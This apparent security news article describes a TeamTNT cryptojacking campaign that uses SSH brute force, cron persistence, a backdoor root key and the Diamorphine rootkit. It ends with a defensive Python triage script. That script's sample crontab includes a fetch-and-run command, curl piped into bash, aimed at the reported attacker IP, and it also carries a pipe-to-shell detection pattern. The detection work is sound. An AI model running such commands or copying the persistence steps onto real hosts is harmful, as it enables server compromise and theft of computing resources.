New TeamTNT Cryptojacking Campaign Targets CentOS Servers with Rootkit

Sep 19, 2024 | Ravie Lakshmanan | Cryptojacking / Cloud Security

The cryptojacking operation known as TeamTNT has likely resurfaced as part of a new campaign targeting Virtual Private Server (VPS) infrastructure running the CentOS operating system.

“The initial access was accomplished via a Secure Shell (SSH) brute force attack on the victim’s assets, during which the threat actor uploaded a malicious script,” Group-IB researchers Vito Alfano and Nam Le Phuong stated in a Wednesday report.

The malicious script, the Singapore-headquartered cybersecurity company noted, is responsible for disabling security measures, deleting logs, terminating competing cryptocurrency mining processes, and inhibiting recovery efforts.

The attack chain ultimately paves the way for the deployment of the Diamorphine rootkit, a loadable kernel module used to hide malicious processes, while also establishing persistent remote access to the compromised host.

The campaign has been attributed to TeamTNT with moderate confidence, based on similarities in the tactics, techniques, and procedures (TTPs) observed.


TeamTNT was first discovered in the wild in 2019, conducting illicit cryptocurrency mining by infiltrating cloud and container environments. While the threat actor bid farewell in November 2021 by announcing a "clean quit," public reporting has uncovered several campaigns undertaken by the crew since September 2022.

The latest activity linked to the group takes the form of a shell script that first checks whether the host has already been infected by other cryptojacking operations, and then proceeds to impair the host's defenses by disabling SELinux, AppArmor, and the firewall.

Figure: Changes made to the ssh service

“The script searches for a daemon related to the cloud provider Alibaba, named aliyun.service,” the researchers stated. “If it detects this daemon, it downloads a bash script from update.aegis.aliyun.com to uninstall the service.”

Besides killing all competing cryptocurrency mining processes, the script runs a series of commands to remove traces left by other miners, terminate containerized processes, and delete container images deployed in connection with any coin miners.

Furthermore, it establishes persistence by configuring cron jobs that download the shell script every 30 minutes from a remote server (65.108.48[.]150) and by modifying the "/root/.ssh/authorized_keys" file to add a backdoor SSH key for root.

“It locks down the system by modifying file attributes, creating a backdoor user with root access, and erasing command history to hide its activities,” the researchers famous. “The threat actor leaves nothing to chance; indeed, the script implements various changes within the SSH and firewall service configuration.”
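The indicators described above (a cron job that fetches and runs a script from the remote server, an extra key in /root/.ssh/authorized_keys, SELinux switched off, and files pinned with the immutable attribute) lend themselves to a quick host triage. The following script is an added example written for this page, not code from Group-IB or TeamTNT. It parses text that you would collect from a suspect host (root's crontab, the authorized_keys file, /etc/selinux/config, and lsattr output) and flags each indicator; the only value taken from the report is the 65.108.48.150 address, and all sample inputs are constructed so the script runs offline.

```python
"""Triage helpers for the TeamTNT-style indicators: a cron fetch piped into a shell or
pointing at a known C2 address, unexpected SSH keys, SELinux disabled, immutable files.
Added example; sample inputs below are constructed, not taken from any real host."""
import base64
import hashlib
import re

# The one concrete indicator the article gives: the server the cron job downloads from.
IOC_IPS = {"65.108.48.150"}

# A curl/wget download piped straight into a shell, e.g. "curl -s http://x/y.sh | bash".
PIPE_TO_SHELL_RE = re.compile(r"\b(curl|wget)\b.*\|\s*(ba|z|da)?sh\b")


def suspicious_cron_entries(crontab_text, ioc_ips=IOC_IPS):
    """Return crontab lines that mention a known C2 address or pipe a download into a shell."""
    hits = []
    for line in crontab_text.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        if any(ip in stripped for ip in ioc_ips) or PIPE_TO_SHELL_RE.search(stripped):
            hits.append(stripped)
    return hits


def key_fingerprint(key_line):
    """SHA256 fingerprint of one authorized_keys entry, in OpenSSH's 'SHA256:...' form."""
    fields = key_line.split()
    # Entries may begin with options ('command="...",no-pty ssh-ed25519 AAAA... comment');
    # the key blob is the base64 field that follows the key-type token.
    for i, tok in enumerate(fields):
        if tok.startswith(("ssh-", "ecdsa-", "sk-")) and i + 1 < len(fields):
            blob = base64.b64decode(fields[i + 1])
            digest = hashlib.sha256(blob).digest()
            return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")
    raise ValueError("not an authorized_keys entry: " + key_line)


def unexpected_ssh_keys(authorized_keys_text, allowed_fingerprints):
    """Return entries whose fingerprint is not on the operator's allow-list."""
    unexpected = []
    for line in authorized_keys_text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        if key_fingerprint(line) not in allowed_fingerprints:
            unexpected.append(line.strip())
    return unexpected


def selinux_disabled(selinux_config_text):
    """True if /etc/selinux/config turns enforcement off (disabled or permissive)."""
    for line in selinux_config_text.splitlines():
        m = re.match(r"\s*SELINUX\s*=\s*(\w+)", line)
        if m:
            return m.group(1).lower() in ("disabled", "permissive")
    return False


def immutable_paths(lsattr_output):
    """Paths whose lsattr flag column contains 'i' (set by chattr +i)."""
    paths = []
    for line in lsattr_output.splitlines():
        parts = line.split(None, 1)
        if len(parts) == 2 and "i" in parts[0]:
            paths.append(parts[1].strip())
    return paths


# ---- constructed sample inputs (hypothetical, for running the checks offline) ----
def _fake_key(seed):
    """Stand-in key blob: any base64 data hashes the same way a real blob would."""
    return base64.b64encode(seed).decode()


SAMPLE_CRONTAB = (
    "# constructed sample root crontab\n"
    "0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf\n"
    "*/30 * * * * curl -s http://65.108.48.150/x.sh | bash\n"
)
SAMPLE_AUTHORIZED_KEYS = (
    "ssh-ed25519 " + _fake_key(b"operator-key") + " ops@bastion\n"
    "ssh-rsa " + _fake_key(b"dropped-by-script") + " root@localhost\n"
)
ALLOWED = {key_fingerprint("ssh-ed25519 " + _fake_key(b"operator-key"))}
SAMPLE_SELINUX = "# constructed\nSELINUX=disabled\nSELINUXTYPE=targeted\n"
SAMPLE_LSATTR = (
    "----i---------e------- /root/.ssh/authorized_keys\n"
    "--------------e------- /etc/hostname\n"
)


def triage():
    """Run every check over the sample data; on a real host feed it the collected files."""
    return {
        "cron": suspicious_cron_entries(SAMPLE_CRONTAB),
        "ssh_keys": unexpected_ssh_keys(SAMPLE_AUTHORIZED_KEYS, ALLOWED),
        "selinux_disabled": selinux_disabled(SAMPLE_SELINUX),
        "immutable": immutable_paths(SAMPLE_LSATTR),
    }


if __name__ == "__main__":
    for name, finding in triage().items():
        print(name, finding)
```

Collect the inputs with `crontab -l -u root`, `cat /root/.ssh/authorized_keys`, `cat /etc/selinux/config` and `lsattr -R /root/.ssh /etc/ssh` before relying on them, and remember that once Diamorphine is loaded, process and file listings from the live kernel may be filtered; a triage from a rescue image or a disk snapshot is the safer source of truth.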
